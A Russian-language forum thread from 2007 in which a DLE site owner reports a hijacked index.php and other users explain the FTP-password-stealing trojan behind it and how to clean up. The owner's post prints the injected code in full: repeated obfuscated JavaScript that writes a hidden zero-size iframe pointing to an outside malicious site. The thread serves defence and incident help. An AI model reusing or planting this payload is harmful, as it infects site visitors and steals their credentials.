ReviX 0 Опубликовано: 3 ноября 2007 Рассказать Опубликовано: 3 ноября 2007 вообщем незнаю что произошло ночью с всё было нормально. у меня стал пустым index.php Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 вообщем незнаю что произошло ночью с всё было нормально. у меня стал пустым index.php у хостера спросите, логи посмотрите, скрипт неумеет писать в index.php, прав нет на запись в этот файл. Цитата Ссылка на сообщение Поделиться на других сайтах
ReviX 0 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 Автор Вчера утром обнаружил чистый файл index.php , а в нем данный код: <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --><!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C117%2C116%2C105%2C108%2C115%2C46%2C103%2C115%2C109%2C45%2C112%2C105%2C110%2C103%2C46%2C114%2C117%2C47%2C105%2C99%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --> Цитата Ссылка на сообщение Поделиться на других сайтах
Araks 0 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 Это вирус ты подхватил... Было такое же... Обязательно поменяй логин и пароль, или хотя бы пароль к ФТП. Этот вирус многие сайты поразил на ДЛЕ. Все очень просто. Я уверен, что ты используешь TotalCommander для доступа по ФТП. Именно оттуда троян ворует пароли ко всем ФТП, которые ты и все другие естественно прописывают с логином и паролем, не вводя каждый раз, что намного обезопасило бы... В общем выходов несоклько: 1) больше не пользоваться Тоталом (хотя если не используешь его - то трояны научились воровать еще и из втоего ФТП-менеджера). 2) поставить хороший Фаервол, хорошо защищающий от выполнения подозрительных скриптов на зараженных сайтов. Твой сайт уже стал зараженным, так что если на него зайдут люди у которых в Тотале имеются доступы к ФТП-аккаунтам, они автоматически заразятся... Я поставил KIS7 (Kaspersky Internet Security 7) - проблема сразу же исчезла. Заходя на зараженные сайты Антивирусник начинает ругаться. Поэтому имея доступ к одному ФТП у нескольких админов, желательно их попросить сделать то же самое... И заходя на сайт по ФТП сразу молжешь посмотреть какого числа был изменен index.php (обычно просто дописывается этот код, так что посетители даже не подозревают, что сайт заражен). Если число изменения этого файла свежее, то есть отличается от того, которого ты его редактировал и размер расходится с размером на твоем локальном, смело заменяй... Так же проверь все файлы от ДЛЕ имеющие название index.* и main.*, а именно: /index.php /backup/index.html /engine/inc/main.php /templates/все шаблоны/main.tpl Во всех этих файлах проверь в коде наличие в самом низу (иногда в самом верху) таких подозрительных кодов, иногда они помещаются в <iframe>ЗДЕСЬ САЙТ С ТРОЯНОМ</iframe>... Не советую заходить по адресу, указанному в <ifreme>'ах... Вот такая поучительная история Цитата Ссылка на сообщение Поделиться на других сайтах
ReviX 0 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 Автор Araks, спасибо за разъяснения , буду искать...какой лучше фтп клиент использовать? Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 от Total не откажусь - удобно же и отказываться от хорошего продукта - не способ борьбы с врагами =) Что касается ифреймов - сейчас практически отказались от них в пользу сжатого ява скрипт кода, так что лучше полностью просматривайте файл на наличие мусора Цитата Ссылка на сообщение Поделиться на других сайтах
ReviX 0 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 Автор lifestar, ну а как быть с Total ? Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 ноября 2007 Рассказать Опубликовано: 4 ноября 2007 ReviX, да всё так же - стандартный набор антивирус+фаервол. Но чую скоро появятся новые модификации, не распознаваемые тем же Касперским Цитата Ссылка на сообщение Поделиться на других сайтах
Araks 0 Опубликовано: 5 ноября 2007 Рассказать Опубликовано: 5 ноября 2007 Да, от TotalCommandera я тоже не отказался, хорошие Антивирус + Фаервол делают свое дело. Но, согласен lifestar, скоро и они могут не спасать... Хотя с обновлениями троянов/вирусов так же обновляется и защита против них. Так что ставь хороший фаервол, юзай тотал и проблемы исчезнут... А пароли обязательно поменяй, потому что трояны их собирают, и каждый день прверяют все ФТП хранилища на наличие своего кода. Как только вы заменили свой файл на правильный, через день обратите внимание, они опять будут с вирусом (это если не поменять пароли)... Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 5 ноября 2007 Рассказать Опубликовано: 5 ноября 2007 Araks, вот кстати нашёл по теме http://shabalin.livejournal.com/53087.html Читаем особенно комментарии от dmih Цитата Ссылка на сообщение Поделиться на других сайтах
Araks 0 Опубликовано: 5 ноября 2007 Рассказать Опубликовано: 5 ноября 2007 Да, познавательно, но к теме имхо не относится... Именно о веб-троянах, о которых говорилось выше там не сказано. Хотя внедрение в .pdf-файлы уже наводит страху... Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.